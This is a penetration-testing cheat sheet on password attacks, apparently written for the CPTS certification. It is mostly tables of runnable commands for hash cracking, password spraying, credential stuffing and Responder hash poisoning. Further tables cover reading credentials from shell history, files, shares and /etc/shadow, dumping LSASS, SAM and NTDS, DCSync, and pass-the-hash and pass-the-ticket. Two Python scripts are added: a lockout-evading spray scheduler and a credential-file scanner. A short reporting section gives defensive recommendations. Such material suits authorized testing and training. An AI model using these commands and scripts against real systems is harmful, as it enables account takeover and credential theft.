Methodology Checklist
- Identify the hash type before cracking: `hashid -m [HASH]` / `hashcat --identify [HASH_FILE]`
- Order of attack: default creds → credential stuffing → spray → targeted brute → full crack
- Check the lockout policy before any spray: `--pass-pol` / `net accounts`
- Crack with John (CPU, auto-detects format) or Hashcat (GPU); pick one per hash rather than running both against the same hash
- Protected files/archives: convert with the matching `*2john` tool, then crack
- Have an NT hash → PtH directly (no crack needed); have a ticket → PtT
- Hunt for stored creds (files, history, managers, shares) before privesc
- Document every credential with its source, hash, and method used
Operational Context
Use when: Master reference for every password/credential attack in the CPTS lifecycle: hash cracking, network spraying, capture, credential hunting, OS credential dumps, and pass-the-X reuse.
Think Dumber First: Try default creds and known breach data before spraying; spray (one password per account per observation window, typically 30 min) before brute force; PtH/PtT before cracking. Never jump to full brute force first.
Skip when: N/A (master reference document).
Tactical Cheatsheet
Hash Identification
| Command | Tactical Outcome |
|---|---|
| `hashid -j [HASH]` | Identify hash type + John format flag |
| `hashid -m [HASH]` | Identify hash type + Hashcat mode ID |
| `hashcat --identify hash.txt` | Hashcat-native hash identification |
| `haiti [HASH]` | Modern hash identifier (ranked guesses) |
| `hashcat --help \| grep -i "[PROTOCOL]"` | Search Hashcat modes by service name |
Cracking β John & Hashcat
| Command | Tactical Outcome |
|---|---|
| `john --wordlist=[WORDLIST] [HASH_FILE]` | John dictionary crack (auto-detect format) |
| `john --format=[FORMAT] --wordlist=[WORDLIST] [HASH_FILE]` | John crack with explicit format |
| `john --single [HASH_FILE]` | Single-crack mode: mutates username/GECOS metadata into candidates |
| `john --show [HASH_FILE]` | Show already-cracked passwords |
| `john --fork=[CORES] --wordlist=[WORDLIST] [HASH_FILE]` | CPU parallelism across cores |
| `hashcat -a 0 -m [MODE] [HASH_FILE] [WORDLIST]` | Hashcat dictionary attack |
| `hashcat -a 0 -m [MODE] [HASH] rockyou.txt -r /usr/share/hashcat/rules/best64.rule` | Dictionary + best64 rules |
| `hashcat -a 3 -m [MODE] [HASH] '?u?l?l?l?l?d?s'` | Mask attack (known pattern: upper, 4 lower, digit, symbol) |
| `hashcat -m [MODE] [HASH] --show` | Show cracked results from potfile |
Wordlists & Rules
| Command | Tactical Outcome |
|---|---|
| `cewl [URL] -d 4 -m 6 --lowercase -w wordlist.txt` | Build targeted wordlist by spidering a site (depth 4, min length 6) |
| `cupp -i` | Interactive profile-based wordlist (OSINT on target) |
| `username-anarchy -i names.txt` | Generate username permutations |
| `hashcat --stdout wordlist.txt -r [RULE]` | Preview mangled candidates a rule produces |
| `john --rules=[RULE] --wordlist=[WORDLIST] [HASH_FILE]` | Apply John mangling rules |
Protected Files & Archives
| Command | Tactical Outcome |
|---|---|
| `ssh2john [KEY] > ssh.hash && john --wordlist=rockyou.txt ssh.hash` | SSH private-key passphrase crack |
| `pfx2john [FILE].pfx > pfx.hash && john pfx.hash` | PFX/PKCS#12 certificate passphrase |
| `zip2john [FILE].zip > zip.hash && john --wordlist=rockyou.txt zip.hash` | Password-protected ZIP |
| `rar2john [FILE].rar > rar.hash && john rar.hash` | Password-protected RAR |
| `7z2john.pl [FILE].7z > 7z.hash && john 7z.hash` | Password-protected 7-Zip |
| `office2john [FILE].docx > off.hash && john off.hash` | MS Office document password |
| `pdf2john [FILE].pdf > pdf.hash && john pdf.hash` | PDF document password |
| `keepass2john [FILE].kdbx > kp.hash && john kp.hash` | KeePass database master password |
| `bitlocker2john -i [FILE].vhd \| grep "bitlocker\$0" > bl.hash && hashcat -m 22100 bl.hash rockyou.txt` | BitLocker volume crack (`$bitlocker$0$` = user-password hash) |
Network β Spraying & Stuffing
| Command | Tactical Outcome |
|---|---|
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] --pass-pol` | Read lockout/password policy FIRST (threshold, observation window, lockout duration) |
| `nxc smb [SUBNET]/24 -u [USER_LIST] -p '[PASS]' --continue-on-success` | Password spray across subnet (collect all valid hits instead of stopping at the first) |
| `nxc winrm [TARGET_IP] -u [USER_LIST] -p [PASS_LIST]` | WinRM spray; `Pwn3d!` = can run commands over WinRM (admin or Remote Management Users) |
| `kerbrute passwordspray -d [DOMAIN] --dc [DC_IP] [USER_LIST] '[PASS]'` | Kerberos pre-auth spray (quieter: no 4625 logon events, but failures still count toward lockout) |
| `hydra -C [CRED_LIST] ssh://[TARGET_IP]` | Credential stuffing (`-C` = user:pass file, one pair per line) |
| `hydra -L [USER_LIST] -P [PASS_LIST] rdp://[TARGET_IP] -t 4` | RDP brute (low thread count; RDP drops connections under parallel load) |
| `hydra -l [USER] -P [PASS_LIST] [TARGET_IP] http-post-form "[PATH]:[BODY]:[FAIL_STR]"` | Web login form brute (`[FAIL_STR]` = text the page shows on a failed login) |
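The lockout-policy caveat that runs through this section (check `--pass-pol` first, one password per observation window, counter measured from the last failure) is easy to get wrong by hand. The following is an added example, not a tool from the page or from NetExec/kerbrute: it models a Windows lockout policy the way a DC applies it to badPwdCount, tells you whether the next attempt against an account is safe, and chunks a password list into rounds with the required pause. The policy values, account names and attempt history are constructed.

```python
"""Lockout-aware password-spray scheduling (added example, constructed data).

Models the values read with `nxc smb ... --pass-pol` / `net accounts` the way a
DC applies them: a success zeroes badPwdCount; the observation window is
measured from the LAST failure, so every failed attempt restarts the clock.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

MIN = timedelta(minutes=1)
T0 = datetime(2024, 6, 3, 9, 0)          # constructed start of the spray


@dataclass
class LockoutPolicy:
    threshold: int                  # "Account lockout threshold"; 0 = never locks
    observation_window: timedelta   # "Reset account lockout counter after"
    lockout_duration: timedelta     # "Account lockout duration"; 0 = admin must unlock
    safety_margin: int = 2          # failures left over for the user's own typos

    def attempts_per_window(self):
        """Failures we allow ourselves per account per window; None = unlimited."""
        if self.threshold == 0:
            return None
        # The threshold-th failure locks the account, so threshold-1 are survivable.
        return max(0, self.threshold - 1 - self.safety_margin)


class SprayLog:
    """Per-account attempt history replayed with DC semantics."""

    def __init__(self):
        self.attempts = {}          # user -> [(when, succeeded), ...]

    def record(self, user, when, succeeded):
        self.attempts.setdefault(user, []).append((when, succeeded))
        self.attempts[user].sort()

    def _replay(self, user, now, policy):
        count, last_fail = 0, None
        for when, ok in self.attempts.get(user, []):
            if when > now:
                break
            if ok:                                   # successful logon resets the counter
                count, last_fail = 0, None
                continue
            if last_fail is not None and when - last_fail > policy.observation_window:
                count = 0                            # window expired before this failure
            count += 1
            last_fail = when
        if last_fail is not None and now - last_fail > policy.observation_window:
            count = 0
        return count, last_fail

    def bad_count(self, user, now, policy):
        return self._replay(user, now, policy)[0]

    def can_attempt(self, user, now, policy):
        budget = policy.attempts_per_window()
        return budget is None or self.bad_count(user, now, policy) < budget

    def next_safe_time(self, user, now, policy):
        """Earliest time the next attempt fits the budget; None if locked with no auto-unlock."""
        count, last_fail = self._replay(user, now, policy)
        if self.can_attempt(user, now, policy):
            return now
        if policy.threshold and count >= policy.threshold:          # already locked out
            return None if policy.lockout_duration == timedelta(0) else last_fail + policy.lockout_duration
        return last_fail + policy.observation_window + MIN


def spray_plan(passwords, policy):
    """Chunk passwords into rounds that fit the budget, with the pause before the next round."""
    budget = policy.attempts_per_window()
    if budget is None:
        return [{"passwords": list(passwords), "wait_after": None}]
    if budget == 0:
        raise ValueError("threshold too low for the safety margin: one password per window, by hand")
    rounds = [list(passwords[i:i + budget]) for i in range(0, len(passwords), budget)]
    return [{"passwords": chunk,
             "wait_after": policy.observation_window + MIN if i < len(rounds) - 1 else None}
            for i, chunk in enumerate(rounds)]


# Constructed policy: 5 failures lock, 30-minute window and lockout.
POLICY = LockoutPolicy(5, 30 * MIN, 30 * MIN)
PASSWORDS = ["Spring2024!", "Summer2024!", "Autumn2024!", "Winter2024!", "Welcome1"]


def demo_log():
    """Constructed history: alice failed twice, bob failed once then logged in."""
    log = SprayLog()
    log.record("alice", T0, False)
    log.record("alice", T0 + 10 * MIN, False)
    log.record("bob", T0, False)
    log.record("bob", T0 + 5 * MIN, True)
    return log


if __name__ == "__main__":
    log = demo_log()
    now = T0 + 20 * MIN
    print("alice safe now?", log.can_attempt("alice", now, POLICY), "next:", log.next_safe_time("alice", now, POLICY))
    for i, rnd in enumerate(spray_plan(PASSWORDS, POLICY), 1):
        print(f"round {i}: {rnd['passwords']} then wait {rnd['wait_after']}")
```

With the constructed policy alice's two failures at 09:00 and 09:10 leave no budget at 09:20 or 09:35; the window is 30 minutes from 09:10, so the next safe attempt is 09:41, not 09:30. Feed real `--pass-pol` values into `LockoutPolicy` and the real attempt times into `SprayLog` and the same logic applies.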
Network β Capture & Poisoning
| Command | Tactical Outcome |
|---|---|
| `sudo tcpdump -i [IFACE] -w capture.pcap` | Capture traffic to file |
| `sudo tcpdump -i [IFACE] -A \| grep -i "pass" --color=auto` | Live grep traffic for creds |
| `sudo tcpdump -i [IFACE] 'port 21 or port 23 or port 80' -w capture.pcap` | Capture only cleartext ports (FTP, Telnet, HTTP) |
| `netsh trace start capture=yes tracefile=C:\trace.etl` / `netsh trace stop` | Windows capture start/stop (.etl; convert with etl2pcapng for Wireshark) |
| `sudo responder -I [IFACE] -A` | Analyze mode: passive listen, no poisoning (run first) |
| `sudo responder -I [IFACE] -w -r -f` | Active poisoning: capture Net-NTLMv2 hashes (`-w` WPAD, `-r` NBT-NS redirect answers, `-f` fingerprint hosts) |
| `Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y` | Windows-side hash poisoning (PowerShell) |
Credential Hunting β Windows
| Command | Tactical Outcome |
|---|---|
| `findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.ps1 *.yml` | Hunt creds in files |
| `(Get-PSReadLineOption).HistorySavePath`, then `type [PATH]` | PowerShell history file |
| `cmdkey /list` | Stored Credential Manager entries |
| `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` | Autologon creds |
| `C:\Temp\lazagne.exe all` | Dump all stored Windows credentials |
| `Snaffler.exe -s` | Auto-hunt sensitive files across shares |
| `runas /savecred /user:[USER] cmd` | Reuse a saved credential |
Credential Hunting β Linux
| Command | Tactical Outcome |
|---|---|
| `for l in .conf .config .cnf; do find / -name "*$l" 2>/dev/null \| grep -v -e lib -e fonts -e share -e core; done` | Hunt config files |
| `grep -rni "password" /home /var/www /etc 2>/dev/null` | Recursive cred grep |
| `cat ~/.bash_history ~/.*_history 2>/dev/null` | Shell history for creds |
| `sudo python3 mimipenguin.py` | Dump cleartext creds from memory (root) |
| `python3 firefox_decrypt.py` | Decrypt Firefox saved logins |
| `sudo python2.7 laZagne.py all` | Dump all stored Linux credentials |
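The `findstr` and `grep -rni "password"` one-liners above return every line containing the word, most of which are templates, redactions or variable names. The following is an added example, not a tool from the page: it runs the same keyword hunt as code over constructed sample files (a PHP config, a web.config, a shell history, a YAML template, an SSH key and a .env), drops obvious placeholders, and records each hit with file and line so it can go straight into the credential log the checklist asks for. File names and contents are invented; nothing is read from disk.

```python
"""Keyword credential hunt with provenance (added example, constructed input)."""
import re

PATTERNS = [
    # key=value / key: value, the shape found in .ini, .config, .yml, .php, .env files
    ("assignment", re.compile(
        r"""(?i)(?<![a-z0-9])(pass(?:word|wd|phrase)?|pwd|secret|token|api[_-]?key)(?![a-z0-9])"""
        r"""\s*[=:]\s*["']?([^\s"';,]{4,})""")),
    # scheme://user:pass@host, the shape found in connection strings and .env files
    ("url_cred", re.compile(r"""(?i)\b[a-z][a-z0-9+.-]*://([^\s:/@]+):([^\s@/]+)@""")),
    # -p<pass>, -p '<pass>', --password=<pass>, /p:<pass> as typed into a shell history
    ("shell_history", re.compile(r"""(?:^|\s)(?:-p|--password[=\s]|/p:)\s*['"]?([^\s'"]+)""")),
    ("private_key", re.compile(r"-----BEGIN (?:RSA |OPENSSH |EC |DSA )?PRIVATE KEY-----")),
]
PLACEHOLDERS = {"password", "changeme", "none", "null", "secret", "example", "todo", "xxx"}


def is_placeholder(value):
    """True for template values and redactions that are not worth logging."""
    v = value.strip("\"'").lower()
    return v in PLACEHOLDERS or v.startswith(("${", "{{", "<", "%")) or set(v) <= set("*x.")


def hunt(files):
    """files: {path: content}. One finding per matched value, with its source."""
    findings = []
    for path, content in files.items():
        for no, line in enumerate(content.splitlines(), 1):
            for kind, rx in PATTERNS:
                for m in rx.finditer(line):
                    value = m.group(m.lastindex) if m.lastindex else "(private key material)"
                    if kind != "private_key" and is_placeholder(value):
                        continue
                    findings.append({"file": path, "line": no, "kind": kind,
                                     "value": value, "context": line.strip()})
    return findings


def credential_log(findings):
    """Rows for the engagement credential log: source | method | value."""
    return [f"{f['file']}:{f['line']} | {f['kind']} | {f['value']}" for f in findings]


# Constructed sample files; none of these hosts, paths or secrets are real.
SAMPLE_FILES = {
    "/var/www/app/config.php": "<?php\n$db_host = 'localhost';\n$db_pass = 'Summ3r2024!';\n",
    "C:\\inetpub\\wwwroot\\web.config":
        '<connectionStrings>\n  <add name="db" connectionString="Server=sql01;User Id=sa;Password=P@ssw0rd!" />\n</connectionStrings>\n',
    "/home/dev/.bash_history": "mysql -u root -pR00tMe!\nsshpass -p 'Tr0ub4dor&3' ssh backup@10.10.10.5\nls -la\n",
    "/etc/app/settings.yml": "database:\n  password: ${DB_PASSWORD}\n  api_key: changeme\n",
    "/home/dev/.ssh/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n",
    "/opt/deploy/.env": "REDIS_URL=redis://default:c4ch3Pass@redis.internal:6379/0\n",
}

if __name__ == "__main__":
    for row in credential_log(hunt(SAMPLE_FILES)):
        print(row)
```

Against the constructed input the YAML template produces no findings (both values are placeholders) while the PHP, web.config, history, .env and key files each produce one; the `context` field keeps the raw line so the finding can be verified before it is used. To run it on a real host, build the `files` dict from a `find`/`Get-ChildItem` walk over the extensions listed in the tables above.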
Network Shares
| Command | Tactical Outcome |
|---|---|
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] --shares` | List readable/writable shares |
| `nxc smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern "passw"` | Spider share for keywords |
| `manspider [TARGET_IP] -d [DOMAIN] -u [USER] -p [PASS] -c "password"` | Crawl shares for cred patterns |
OS Credential Dumps β Windows
| Command | Tactical Outcome |
|---|---|
| `reg.exe save hklm\sam C:\sam.save && reg.exe save hklm\system C:\system.save && reg.exe save hklm\security C:\security.save` | Dump registry hives on target (elevated) |
| `impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL` | Offline hash extraction from hives |
| `nxc smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam` | Remote SAM dump |
| `nxc smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa` | Remote LSA secrets dump |
| `rundll32 C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\lsass.dmp full` | LSASS memory dump (elevated; PID via `Get-Process lsass`) |
| `pypykatz lsa minidump lsass.dmp` | Parse LSASS dump for all cred types |
| `nxc smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil` | Automated NTDS.dit dump via ntdsutil (needs domain admin) |
| `impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL` | Decrypt domain hashes from NTDS |
| `impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm` | DCSync-style remote domain dump (NT hashes only) |
OS Credential Dumps β Linux
| Command | Tactical Outcome |
|---|---|
| `unshadow passwd.bak shadow.bak > unshadowed.txt && john --wordlist=rockyou.txt unshadowed.txt` | Unshadow + crack with John (format auto-detected, yescrypt included) |
| `cut -d: -f2 shadow.bak \| grep '^\$6\$' > hashes.txt && hashcat -m 1800 hashes.txt rockyou.txt` | sha512crypt with Hashcat (hash field only; the extra fields in unshadow output make Hashcat reject the line) |
| `cat /etc/shadow` (root) | Read local password hashes |
Pass-the-X / Reuse
| Command | Tactical Outcome |
|---|---|
| `impacket-psexec [USER]@[TARGET_IP] -hashes :[NTLM_HASH]` | Pass-the-Hash shell |
| `evil-winrm -i [TARGET_IP] -u [USER] -H [NTLM_HASH]` | PtH WinRM shell |
| `nxc smb [TARGET_IP] -u [USER] -d . -H [NTLM_HASH]` | PtH auth check across hosts (local account) |
| `Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[NTLM_HASH] /ptt` | OverPass-the-Hash: request + inject TGT |
| `Rubeus.exe ptt /ticket:[FILE].kirbi` | Inject Kerberos ticket into session |
| `export KRB5CCNAME=[FILE].ccache && klist` | Linux: activate stolen ticket |
| `impacket-ticketConverter ticket.ccache ticket.kirbi` | Convert ticket Linux → Windows (and back) |
| `kinit [USER]@[DOMAIN] -k -t [FILE].keytab` | Linux: impersonate via keytab |
| `python3 gettgtpkinit.py -cert-pfx [FILE].pfx -dc-ip [DC_IP] [DOMAIN]/[USER] /tmp/ticket.ccache` | Pass-the-Certificate → TGT |
| `pywhisker --dc-ip [DC_IP] -d [DOMAIN] -u [USER] -p [PASS] --target [TARGET] --action add` | Shadow Credentials injection |
Deep Dive & Workflow
Decision Tree β What to Attack First
```text
Have a shell?
├─ Local admin → SAM/LSASS/NTDS dump → crack or PtH
├─ Domain user → credential hunting (shares, files, history)
└─ Limited user → credential hunting + privesc first
Have hashes?
├─ NT hash → PtH directly (no crack needed)
├─ Kerberos ticket → PtT
└─ Need plaintext → crack with Hashcat (GPU) / John (CPU)
On the network?
├─ Passive → tcpdump, Wireshark filters
├─ Active poisoning → Responder (LLMNR/NBT-NS)
└─ Share hunting → Snaffler, NetExec spider, MANSPIDER
No creds at all?
├─ Default creds → service-specific lists
├─ Breach data → credential stuffing (hydra -C)
└─ Username list → spray (1 password per observation window)
```
Hash Type Quick Reference
| Hash | Mode | Where Found |
|---|---|---|
| NT (NTLM) | 1000 | SAM, LSASS, NTDS |
| NetNTLMv2 | 5600 | Responder captures |
| DCC2 (cached domain) | 2100 | SECURITY hive |
| sha512crypt $6$ | 1800 | Linux /etc/shadow |
| yescrypt $y$ | none (Hashcat has no yescrypt mode) | Modern Linux shadow (Debian 11+, Ubuntu 22.04+); crack with `john --format=crypt` |
| bcrypt $2*$ | 3200 | App DBs (GPU-hard: slow even on GPUs) |
| BitLocker | 22100 | VHD disk images |
| KeePass | 13400 | .kdbx databases |
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which cracker | Multiple options | Hashcat for GPU speed; John for CPU, format auto-detection and formats Hashcat lacks (yescrypt); don't run both against the same hash at once |
| Spray lockout triggered | Observation window misread | Verify with `--pass-pol`; badPwdCount resets only once the window has elapsed since the LAST failure, so every failed attempt restarts the clock |
| Default creds list incomplete | Generic list | Use seclists/Passwords/Default-Credentials/ per-service lists |
| Hash mode unknown | Need identifier | hashcat --identify / hashid -m / haiti |
| Attack too slow | CPU/GPU bottleneck | Crack fast hashes (NT, MD5, SHA1) first; `john --fork` on CPU; budget separately for bcrypt/yescrypt, which stay slow even on GPU |
| LSASS dump blocked | EDR / PPL | Use comsvcs.dll MiniDump or nanodump; parse offline with pypykatz |
| Cracked pass but no reuse | Account scoped | Try PtH/spray across hosts with NetExec before assuming dead end |
Reporting Trigger
Finding Title: Password Attack Methodology Applied Across All Identified Services
Impact: Systematic password attacks (default credentials, spraying, hash cracking, and credential reuse) provide multiple pathways to valid credentials across all exposed services and user accounts.
Root Cause: Absence of MFA, weak password policies, cleartext credential storage, and no anomalous-authentication alerting permit methodical password attacks without detection.
Recommendation: Implement MFA across all services. Enforce a strong password policy (12+ chars, no dictionary words). Alert on failed-authentication patterns consistent with spraying (many accounts, few passwords, short window). Implement credential-breach monitoring.
Related Nodes
- Master Cheatsheets Index
- Password_Attacks_Cheat_Sheet
- Password_Cracking_JohnTheRipper
- Password_Cracking_Hashcat
- Password_Cracking_Wordlists_Rules
- Password_Cracking_Protected_Files
- Password_Cracking_Archives
- Password_Attacks_Spraying_Stuffing
- Password_Attacks_Network_Services
- Credential_Hunting_Windows
- Credential_Hunting_Linux
- Credential_Hunting_Network_Shares
- Credential_Hunting_Network_Traffic
- Windows_Credential_Dump_SAM
- Windows_Credential_Dump_LSASS
- Windows_Credential_Dump_NTDS
- Windows_Credential_Manager
- Pass_the_Hash
- Pass_the_Ticket_Windows
- Pass_the_Certificate